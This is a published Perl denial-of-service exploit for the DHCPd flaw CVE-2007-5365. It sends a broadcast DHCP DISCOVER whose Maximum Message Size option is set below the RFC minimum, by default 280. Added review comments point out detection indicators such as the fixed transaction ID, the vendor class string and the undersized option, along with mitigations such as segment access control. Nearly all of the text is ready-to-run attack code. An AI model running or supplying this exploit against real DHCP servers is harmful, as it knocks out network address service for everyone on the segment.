Credit:
The information has been provided by RoMaNSoFt.
Exploit:
#!/usr/bin/perl
# DoS Exploit for DHCPd bug (CVE-2007-5365)
# By Roman Medina-Heigl Hernandez
# a.k.a. RoMaNSoFt <roman@rs-labs.com>
# [27.Oct.2007]
# Tested: Ubuntu 6.06 LTS
use IO::Socket::INET;
use Net::DHCP::Packet;
use Net::DHCP::Constants;
use POSIX qw(setsid strftime);
use Getopt::Long;
### Default config
# $mms is the value this script places in the DHCP Maximum Message Size option
# of the DISCOVER it builds; it defaults to 280 and can be overridden on the
# command line with --mms=<integer>.
# NOTE(review): RFC 2132 gives 576 as the minimum legal value for this option,
# so the default is out of spec. For defenders, a DHCP client message that
# advertises a maximum message size below 576 is an anomaly worth alerting on,
# and a server fixed for CVE-2007-5365 is expected to tolerate it - confirm
# against the vendor advisory for the dhcpd build in use.
$mms = 280;
GetOptions ('mms=i' => \$mms);
# sample logger
sub logger {
    # Write one log line to STDOUT: a "[dd/Mon/yyyy:HH:MM:SS] " prefix taken
    # from the local clock, then the caller's message and a newline.
    my ($message) = @_;
    my $prefix = strftime("[%d/%b/%Y:%H:%M:%S] ", localtime);
    print STDOUT $prefix;
    print STDOUT $message . "\n";
}
# Main flow: print a banner, open a UDP broadcast socket, build one DHCP
# DISCOVER packet, log it, send it once and exit. No reply is read.
print ("DHCPd DoS exploit (CVE-2007-5365) - RoMaNSoFt, 2007\n---\n");
logger("Opening socket");
# UDP socket aimed at the limited-broadcast address on port 67, with the
# broadcast option enabled. LocalPort 68 is commented out, so the packet
# leaves from whatever source port the OS assigns.
# NOTE(review): because the destination is a local broadcast, the sender
# presumably has to sit on the same segment as the DHCP server (or behind a
# relay); segment access control and DHCP filtering at the switch are
# therefore relevant mitigations alongside patching - confirm per environment.
$handle = IO::Socket::INET->new(Proto => 'udp',
Broadcast => 1,
PeerPort => '67',
## Hacked to work as non-root user :)
# LocalPort => '68',
PeerAddr => '255.255.255.255')
|| die "Socket creation error: $@\n"; # yes, it uses $@ here
# create DHCP Packet DISCOVER
# Fields set: a fixed transaction id (0x12345678), Flags 0x8000, message type
# DISCOVER, vendor class identifier 'rs-labs.com', and the maximum message
# size taken from $mms.
# NOTE(review): the fixed Xid and vendor class string are constants of this
# published proof of concept; they can serve as low-fidelity indicators in
# packet captures but are trivially changed. The more durable signal is the
# maximum-message-size option itself, whose handling in dhcpd is what
# CVE-2007-5365 concerns.
$discover = Net::DHCP::Packet->new(
Xid => 0x12345678,
Flags => 0x8000, # ask for broadcast answer
DHO_DHCP_MESSAGE_TYPE() => DHCPDISCOVER(),
DHO_VENDOR_CLASS_IDENTIFIER() => 'rs-labs.com',
DHO_DHCP_MAX_MESSAGE_SIZE() => $mms,
);
logger("Sending DISCOVER");
# Log the packet's text form (toString) before sending its wire form.
logger($discover->toString());
# Single send of the serialized packet; a send failure aborts with $!.
$handle->send($discover->serialize())
or die "Error sending:$!\n";
logger("Done");
CVE Information:
CVE-2007-5365